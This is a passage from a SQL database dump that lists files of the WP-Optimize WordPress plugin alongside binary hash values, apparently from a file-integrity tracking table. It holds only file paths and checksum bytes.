-','',0,'?'),('ųaޔblGeA','wp-content/plugins/wp-optimize/cache/class-cache-commands.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LX/\0fS*','R@oIeeCkGUuv','',0,'?'),('M`j\'','wp-content/plugins/wp-optimize/cache/class-wpo-cache-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','畜[4-$ɤ4~','o̴fl\'GcVcNv&+','',0,'?'),(')g\0r','wp-content/plugins/wp-optimize/cache/class-wpo-cache-preloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B(fB:h\n','gUA>º(?m8ZQ\ZG7k','',0,'?'),('eY*ZuXk','wp-content/plugins/wp-optimize/cache/class-wpo-cache-rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǔۤf̈́Y','*g=?132 1\Zf>hŲk*','',0,'?'),('\'Hڎȑ*','wp-content/plugins/wp-optimize/cache/class-wpo-detect-cache-plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Xx㩝6U\n?|^~','.wJ;d%ÿFBx\0','',0,'?'),('@.̴`0\\[','wp-content/plugins/wp-optimize/cache/class-wpo-load-url-task.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uӶ-3N`','ѰMM֍VAm)6C*\"N;\'\\z','',0,'?'),('HUH<2ƾ','wp-content/plugins/wp-optimize/cache/class-wpo-page-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\0^MjYSm2','2|Μo܍Q3!%`mv','',0,'?'),('G','wp-content/plugins/wp-optimize/cache/file-based-page-cache-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@\Z0ވT!*','aE^nIjyQ:lB#]XJ$j','',0,'?'),('FgpIC3','wp-content/plugins/wp-optimize/cache/file-based-page-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','598Q/PCL\'','j\\BqR^D<-㙴Hi','',0,'?'),('*jZ;Yw6','wp-content/plugins/wp-optimize/css/admin-3-0-11.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gʨt\\!LIDY','闕ՠ6aa|jh}\0','',0,'?'),('w4C4g=Lk','wp-content/plugins/wp-optimize/css/admin-3-0-11.min.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o; PL|$','=ԉ)̫\rbSR!SB\n@.','',0,'?'),('Jg\\\'ot]','wp-content/plugins/wp-optimize/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!\'\'HDeiR5','E(63̨}Y^rou$5 \'^','',0,'?'),('lq>\"m\"G#\nI','wp-content/plugins/wp-optimize/css/smush-3-0-11.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QC\0eeCl:\"S','0ں]T[q{7)Ֆ҂@=N','',0,'?'),('vnM|','wp-content/plugins/wp-optimize/css/smush-3-0-11.min.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oӣ,<','j}XXY×1jhP\nY3*wLZa)','',0,'?'),('b˻ԴMҜ_8','wp-content/plugins/wp-optimize/css/smush.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^F<8','\0-V(\n7z\"g@z','',0,'?'),(' L<P{','wp-content/plugins/wp-optimize/css/tablesorter/theme.default.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KJ~fD4','og\"qoA \r$(BMoW.a\0k6n','',0,'?'),('\'،{fqOvT聺/','wp-content/plugins/wp-optimize/css/wp-optimize-admin-3-0-11.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\p\rFts,.','&h`j	\0pCы','',0,'?'),('1:8^_','wp-content/plugins/wp-optimize/css/wp-optimize-admin-3-0-11.min.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7DAQt}','!)6K@Vմ#FOw)b\'x9/','',0,'?'),(';md=Ȓl!M','wp-content/plugins/wp-optimize/css/wp-optimize-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɯ	V8T7ap_Wv',';uf%2V(M/7Urb','',0,'?'),('}b8;`\"p','wp-content/plugins/wp-optimize/css/wp-optimize-notices-3-0-11.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_>^mD&*i','BM6A9js\\*{18(CB','',0,'?'),('uUl!Y\rHc*','wp-content/plugins/wp-optimize/css/wp-optimize-notices-3-0-11.min.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EF	{e*-','=cnfg0~Əeǂ~2àLvhg','',0,'?'),('b\\zꋵV','wp-content/plugins/wp-optimize/css/wp-optimize-notices.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x$)2N5{\ZE&n','P4EAd㻮oc\\2Xp\"*m<','',0,'?'),('MS ţ`t','wp-content/plugins/wp-optimize/images/features/auto-optimize.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+>nqa9','M^I ҽK	|e\"O0\Z,洄','',0,'?'),('2P@敘)','wp-content/plugins/wp-optimize/images/features/automatic-clean-ups.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?4&9ۧg','H-rWi{WqQ$_','',0,'?'),('ƻ\ru55\"6','wp-content/plugins/wp-optimize/images/features/automatically cleans.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`gPTx\"%','OvK+\r[\Z@nrYQc-I','',0,'?'),('$XL#gl','wp-content/plugins/wp-optimize/images/features/cache-vehicle-64x64.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KrM氪o\\','-if>\n2Ԯ_P~SAhˉV5','',0,'?'),('Pi2:6A]','wp-content/plugins/wp-optimize/images/features/choice-n-flexibility.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v09\nPCLâ','J핳4Pt-2B9+c(z~','',0,'?'),('0̑;Y4oţ','wp-content/plugins/wp-optimize/images/features/database-optimization-vehicle-64x64.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"&;pOz,','~XZ=l-j1$-N','',0,'?'),('rG6#?ߑAkT','wp-content/plugins/wp-optimize/images/features/displays-database-table-sta.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-j7εԂ','g0n={-+hgmf[','',0,'?'),('}C,ɮeC}q','wp-content/plugins/wp-optimize/images/features/enables-disables-trackbacks.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kh`Nͳc','fewv(:xoU\ZtK%E x:','',0,'?'),('MRBed','wp-content/plugins/wp-optimize/images/features/enhanced-robustness.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3~MsiG','%\'rx\Z5xec玎ҹq+/\nM\n','',0,'?'),(',F(0\0s','wp-content/plugins/wp-optimize/images/features/image-compression-vehicle-64x64.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c䗜a,J','\rI.#vms<R@?V','',0,'?'),('SxZ<ʻ1r\Z','wp-content/plugins/wp-optimize/images/features/keyy_logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޠ4`0ZsU',',J!|M\"B=6>@$','',0,'?'),(';&X/H','wp-content/plugins/wp-optimize/images/features/lazy-load.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0cDaY-f9','Z5gGOgR\'6','',0,'?'),('jI]a\Z\n','wp-content/plugins/wp-optimize/images/features/logging-n-reporting.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z*:d	l\\X','ǪT3U`x	`T8XEB2ԈJ','',0,'?'),('d \\','wp-content/plugins/wp-optimize/images/features/metaslider_logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v.7g1}','Ԕ=<^2+\05[\Zf@','',0,'?'),('N_w29x','wp-content/plugins/wp-optimize/images/features/more-settings.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-+3~.KhNd2','=kW#R|~&T+\0','',0,'?'),(' NapF:','wp-content/plugins/wp-optimize/images/features/multisite-support.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BnƀdUrp','i<9+Y\"#=Mk;,.qC','',0,'?'),('._	^4U','wp-content/plugins/wp-optimize/images/features/number_of_weeks.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T-(_','#hoiC&9\\ͤ\Z','',0,'?'),('#f{+(MLO','wp-content/plugins/wp-optimize/images/features/optimization-preview.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GSgvl','.\r\ZgՍ\"s}Q!(ĉ=9Q%','',0,'?'),('XrIvaS.y','wp-content/plugins/wp-optimize/images/features/optimize-individual.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']>ͧaY$w|f','7ҜB;=0za64˅fCz','',0,'?'),('7\\CCx泥{<','wp-content/plugins/wp-optimize/images/features/premium-support.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^5u','w:C\'?xj$3bث𧎜_Υ','',0,'?'),('.ہY)eFn','wp-content/plugins/wp-optimize/images/features/remove-unwanted-img.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!<^\Z*J{','ij?ݮGYM sK=y','',0,'?'),(')5xis','wp-content/plugins/wp-optimize/images/features/scheduling.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l3HBhȞd\n','.{zst<fgCfk<=tp','',0,'?'),('*S>\Zcg{','wp-content/plugins/wp-optimize/images/features/updraftcentral_logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^E#F;I','y\\|@P\0\nYݯ*]UtE','',0,'?'),('T^>;V ','wp-content/plugins/wp-optimize/images/features/updraftplus_logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\naqYp	F','K&IOk4.;ZCC+yOEdPr','',0,'?'),('ɛ\Z \Z_\Z','wp-content/plugins/wp-optimize/images/features/wp-cli.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kޞ߭yW/A`','qLhj}\0xyF|>7@V','',0,'?'),('Im`dw@G>\0','wp-content/plugins/wp-optimize/images/icon/wpo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ʊtn.|bO>','Oj߽Jq:%fHkYn','',0,'?'),('J`P&+ȳ^,','wp-content/plugins/wp-optimize/images/logo/udp_logo_small.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n3H&{ٍ@','mкkak(:/ z&<Un *f~\0S','',0,'?'),('of\"! =peA','wp-content/plugins/wp-optimize/images/logo/wpo_logo_small.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UYc6<\'',']+M.JA+[\'Y&','',0,'?'),('No2\'}+;W','wp-content/plugins/wp-optimize/images/notices/black_friday.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Pc(0w','/aj/39/J,J^AbB','',0,'?'),('JXhQ3y','wp-content/plugins/wp-optimize/images/notices/cache-video-preview.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2jЗ6Hи','2X(Ty^3ƈx!!Msǳ	','',0,'?'),('U;B/|PD+','wp-content/plugins/wp-optimize/images/notices/christmas.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','௤]\\2E_4','pJL7w}߃b&^','',0,'?'),('ZjfN}Z$K','wp-content/plugins/wp-optimize/images/notices/image-compression-video-preview.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sbNѸa*E','Y!%R7\nBcОK0E`j','',0,'?'),('Xe/Y@>','wp-content/plugins/wp-optimize/images/notices/keyy_logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	\"o)W/','(i.ثo?bFCEvwK','',0,'?'),('xGmP̟-O','wp-content/plugins/wp-optimize/images/notices/logo-bg-notice.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	}>ʠh','s\nEoK`&UOJtMA','',0,'?'),('5H{~M=','wp-content/plugins/wp-optimize/images/notices/metaslider_logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8zr<ڮZӱ','hY6\r;M@6YMT\Z8	(','',0,'?'),('Hv7X\Zs|','wp-content/plugins/wp-optimize/images/notices/new_year.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=uNwta^\r0','ri!2Z:djvt~q','',0,'?'),(';ךږX\\Z^\\','wp-content/plugins/wp-optimize/images/notices/spring.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/#ZxFe^','h%?dd;\"^5','',0,'?'),('ْ&MKX{?','wp-content/plugins/wp-optimize/images/notices/summer.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TBE\r','d,=>alxƩU6y','',0,'?'),('R8K\rN','wp-content/plugins/wp-optimize/images/notices/updraft_logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݲetޡ½6','(Xv\06vU+gj{\"3','',0,'?'),('_9ìD.','wp-content/plugins/wp-optimize/images/notices/wp_optimize_logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qdBnR˶\0w','!*ug{IpGL>W\"VR׶r','',0,'?'),('g*4 %&','wp-content/plugins/wp-optimize/includes/backward-compatibility-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\Z/VFn[','UZнz}r3TRz+','',0,'?'),('8WexTbE','wp-content/plugins/wp-optimize/includes/class-commands.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	֏{pW','<rC\n2Q#R),jfc{I4','',0,'?'),('>+ 16LR#ѽ','wp-content/plugins/wp-optimize/includes/class-updraft-abstract-logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r\Zzql6e:','X95L$ZNe3ޡDn%xhG','',0,'?'),(' 8a	j~\0','wp-content/plugins/wp-optimize/includes/class-updraft-email-logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gbnr5FdA)','Vуu\\=aIvlx\'^,r8XI;>','',0,'?'),('p젋pŔG','wp-content/plugins/wp-optimize/includes/class-updraft-file-logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IPgg]k>','/\'\rjAU\'O}jp;3.`','',0,'?'),('\'**JWe\'pu/A@','wp-content/plugins/wp-optimize/includes/class-updraft-log-levels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&;@2a','iʅa!\\\nJbFR=','',0,'?'),('UZRflxRS','wp-content/plugins/wp-optimize/includes/class-updraft-logger-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ig%x','ƥɄ<WW;*ʠhtBlo','',0,'?'),('WEhaAnYl','wp-content/plugins/wp-optimize/includes/class-updraft-logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AWyHY<g','oG&FpPJps`<Q5\'','',0,'?'),(':(finŹTz','wp-content/plugins/wp-optimize/includes/class-updraft-nitrosmush-task.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z@=^11n','\Z2\"Y\rYᵛwcVmLFJH','',0,'?'),('<dɘ\'?','wp-content/plugins/wp-optimize/includes/class-updraft-php-logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G9 2 R{','\"kTw%/Pܻ=Q&0L','',0,'?'),('$KXUC[d)+K','wp-content/plugins/wp-optimize/includes/class-updraft-resmushit-task.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6@Ϡi/V','{͊,D8b\\DϚpP?rV!','',0,'?'),('A7R1:','wp-content/plugins/wp-optimize/includes/class-updraft-ring-logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QH*.oƬf!','2ns;+\nȃӦ>إB','',0,'?'),('XXx!PrK1','wp-content/plugins/wp-optimize/includes/class-updraft-smush-manager-commands.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|?>T^O\Z','SߋՙP)wYwP1V	?\0@_','',0,'?'),('*W̱\n,͸','wp-content/plugins/wp-optimize/includes/class-updraft-smush-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NI8K8j','@$M<VҧEC:C6q\\E','',0,'?'),('ooÆ%(sdA','wp-content/plugins/wp-optimize/includes/class-updraft-smush-task.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[C0*:','ɛNJ<-[Ay>u(\'Ӯ','',0,'?'),('b^&','wp-content/plugins/wp-optimize/includes/class-updraftcentral-wp-optimize-commands.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oB_]d#iq','Fx%g9v36X(&','',0,'?'),('YqLH','wp-content/plugins/wp-optimize/includes/class-wp-optimization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7jj\n-ڛ1~','a(49O6XyS :W*Q4Nog','',0,'?'),('}\0?\\TOE[7Q','wp-content/plugins/wp-optimize/includes/class-wp-optimize-browser-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VȋE>,Ss','KSbFX;9܍H8','',0,'?'),('a5e/}','wp-content/plugins/wp-optimize/includes/class-wp-optimize-gzip-compression.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`vd*<IV','/7#l{ht̯eX0fh','',0,'?'),('nDSs\"1%F~','wp-content/plugins/wp-optimize/includes/class-wp-optimize-htaccess.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rQ՞G_NU>>','uP9k]DzRmǡ.cu78)W!','',0,'?'),('%:^Pδr','wp-content/plugins/wp-optimize/includes/class-wp-optimize-install-or-update-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7P\"&P','f,#ޣ\n&s3 DP|X','',0,'?'),('<Z1Du;,S','wp-content/plugins/wp-optimize/includes/class-wp-optimize-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&K:o','d/6haw{\Z͏M\r#Y','',0,'?'),('+BFwm}Pj','wp-content/plugins/wp-optimize/includes/class-wp-optimize-transients-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0?\r:E','DC޺<V	,)O[X>r','',0,'?'),('E6T<<','wp-content/plugins/wp-optimize/includes/class-wp-optimizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^\0ߎnZ!Mb','	NA8Wm!({;f³wZ_A','',0,'?'),('T{9\'3¡~s','wp-content/plugins/wp-optimize/includes/updraft-notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tk[Irs','bR76M؟.=o2PbZq1','',0,'?'),('y]m-w4-{','wp-content/plugins/wp-optimize/includes/updraftcentral.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q{*Q$_','F\ZsӺ9m&LyqyPKȦ','',0,'?'),('Z[Cʖp','wp-content/plugins/wp-optimize/includes/wp-optimize-database-information.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^rQ','?`:>`jJxtH+N|˝','',0,'?'),('E#zu?D5','wp-content/plugins/wp-optimize/includes/wp-optimize-notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eo\Z꾞Fn`','kW*r4xTdhF֟6sNE','',0,'?'),(';tYtH`\'','wp-content/plugins/wp-optimize/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7jZ2Y|','1a(C\n\r䆴p$P)Wfs@','',0,'?'),('<ߋUoZc<u+','wp-content/plugins/wp-optimize/js/cache-3-0-11.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p.^ʋ캡','Yb*l\n.lP\Z9;\r)~h','',0,'?'),('rpxp','wp-content/plugins/wp-optimize/js/cache.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<#.*n6غ','8ejOO3ՠ','',0,'?'),('G	ǐ>','wp-content/plugins/wp-optimize/js/handlebars/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1]FeU.','H[xْ\rnDOM	@?UYAC֥Y,','',0,'?'),('U9oy?gzWHW','wp-content/plugins/wp-optimize/js/handlebars/handlebars.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J0 \\ڸl7I','NNiH5hrX-.w','',0,'?'),('K}R,~','wp-content/plugins/wp-optimize/js/handlebars/handlebars.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V@Rh=I`','7Ik?)v2C~eKx','',0,'?'),('KopNd_1','wp-content/plugins/wp-optimize/js/handlebars/handlebars.runtime.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ջ^ݞ','2MuEY17[lta<','',0,'?'),('&]Q\"ޖ\ZMHC','wp-content/plugins/wp-optimize/js/handlebars/handlebars.runtime.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q⿙Qc',']^_JNVB>s:\0z	o[','',0,'?'),('έ(nQ>*G','wp-content/plugins/wp-optimize/js/jquery.blockUI.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','srj@*i','q΂<Ae󺷊Ց~hP','',0,'?'),('L&]~s;','wp-content/plugins/wp-optimize/js/jquery.blockUI.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-\"	\Z=L','i)M	|JoCf.P$Elg`l(','',0,'?'),('ػDҮͣ]	','wp-content/plugins/wp-optimize/js/queue-3-0-11.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SjTyv','v4}^vIMpj8p\nڅ翢','',0,'?'),('c}\0v\Zn}','wp-content/plugins/wp-optimize/js/queue.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','18FSD˥7','G@a{	Gkk\rCP\Z','',0,'?'),('Vk489','wp-content/plugins/wp-optimize/js/serialize-json/jquery.serializejson.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{SAk(uI5s','Iv+BޭՉcd6\"O\\','',0,'?'),('3赱diticQ','wp-content/plugins/wp-optimize/js/serialize-json/jquery.serializejson.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ϣ;Gi$rG9c$','ϯ|/X\n2G:@{\rAL{	','',0,'?'),('t?G9D>pv','wp-content/plugins/wp-optimize/js/tablesorter/jquery.tablesorter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\JYS','gǪ%n.$*ǀ,iӻgI','',0,'?'),('4#IJKf','wp-content/plugins/wp-optimize/js/tablesorter/jquery.tablesorter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\"р$~6\r=B','>I\"\re.)HEp#b','',0,'?'),('nb\r\n?p{AJ','wp-content/plugins/wp-optimize/js/tablesorter/jquery.tablesorter.widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*yT$1\'n','U*qw\nfqYZ','',0,'?'),('(YyiRsŪ','wp-content/plugins/wp-optimize/js/tablesorter/jquery.tablesorter.widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E3&\\tMy',',n[ॡݕ8#','',0,'?'),('G͉(Kο%ZY','wp-content/plugins/wp-optimize/js/wpoadmin-3-0-11.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fԮ\r/zt','>	q+SQíjB&c7Q,','',0,'?'),('&qjd6','wp-content/plugins/wp-optimize/js/wpoadmin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JP&f:sp','m5DFpA[Rs3\nM\r\0yo','',0,'?'),('^^/z\"FZ','wp-content/plugins/wp-optimize/js/wposmush-3-0-11.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Uc~*7n<	','3\rEfN+(*ib ','',0,'?'),('B8dYFH=%','wp-content/plugins/wp-optimize/js/wposmush.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-fd21f','8Mo)ǎefm16?XJ\nAyy','',0,'?'),('i@n0$Uo','wp-content/plugins/wp-optimize/languages/wp-optimize.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{Csc{','tY`(v01$\ZfW','',0,'?'),('0=@ n78d.d','wp-content/plugins/wp-optimize/optimizations/attachments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BCb`4Oňv','!_	\0ت\'Z3\'\nvoc^','',0,'?'),('q6n0q','wp-content/plugins/wp-optimize/optimizations/autodraft.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u:尚͝','jeLz}a0ttcWėt8:i','',0,'?'),('ֺ?9̓?	','wp-content/plugins/wp-optimize/optimizations/commentmeta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B.!!3u','\'cCPM =b~E{uSC\rۿ','',0,'?'),(' }ib$	f<;\0^_','wp-content/plugins/wp-optimize/optimizations/inactive-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';i3FD(ܐ','2}k-y~gnhhs=t','',0,'?'),('CF]\0@','wp-content/plugins/wp-optimize/optimizations/optimizetables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o|fʌ5+',',k*c/07*\09L=֎z:j%','',0,'?'),('ƷMu\\#u|<','wp-content/plugins/wp-optimize/optimizations/orphandata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0(q~&q\n','~8a<T$EKi','',0,'?'),('{/.6ǹҩ}q','wp-content/plugins/wp-optimize/optimizations/orphanedtables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rw^[$\nCiz¥','re\'5$Ym9Wc8xb,ѹ{ܶBD+','',0,'?'),('\r݅#cq -$','wp-content/plugins/wp-optimize/optimizations/pingbacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bL.feYv@','=5褉>S8q5TZӋiu .E','',0,'?'),('hÕ7P}','wp-content/plugins/wp-optimize/optimizations/postmeta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N-FIyG','zpPK/ɹ^8Zy=','',0,'?'),('W;J)&ނh]','wp-content/plugins/wp-optimize/optimizations/repairtables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f{F`G3\Zc','o	_\"ӌ}NXݜ(DXnk2','',0,'?'),('n3Mck','wp-content/plugins/wp-optimize/optimizations/revisions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','٤qsaQ','u~I6\rTS\"gic.x','',0,'?'),('(y0ӌUn2','wp-content/plugins/wp-optimize/optimizations/spam.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!5jd','2Ww\r]x]eRC-8Δ>l','',0,'?'),('~ZO%$','wp-content/plugins/wp-optimize/optimizations/trackbacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VF\Z#\024B','.[?ԇ=Jl?(Fƽ9C+','',0,'?'),('V&vkÉ','wp-content/plugins/wp-optimize/optimizations/transient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hV|v0au',' $,!UsP4v&~J[ƨAX.M@^<','',0,'?'),('<5vCwPV!S','wp-content/plugins/wp-optimize/optimizations/trash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d`܄[\0e1\nG','m3󇁶[%RM_ɮN','',0,'?'),('l]F<c5','wp-content/plugins/wp-optimize/optimizations/unapproved.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VVnO%9A','Zmvoo^[EIT2','',0,'?'),('q1dᆾI','wp-content/plugins/wp-optimize/plugin.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ri','ߋk./k|\'_yy75RK','',0,'?'),('>=+	^SΉFޯ','wp-content/plugins/wp-optimize/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m`ҟJ','= mT2ߎ}E<#W.ޒo','',0,'?'),('9Gn\"QH','wp-content/plugins/wp-optimize/templates/admin-metabox-smush.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yH\'om','KؤP=U!дuu_Z','',0,'?'),('gvϭŵBUw','wp-content/plugins/wp-optimize/templates/admin-page-header-tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e)_t+]\Z','EvfHL5mUyg\ZT@','',0,'?'),(',#ihxar','wp-content/plugins/wp-optimize/templates/admin-page-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uvfX^lA','|\\m/,\nt1BVuQ[x,]	_','',0,'?'),('I>.>WJ[x','wp-content/plugins/wp-optimize/templates/cache/browser-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0~\nCW(y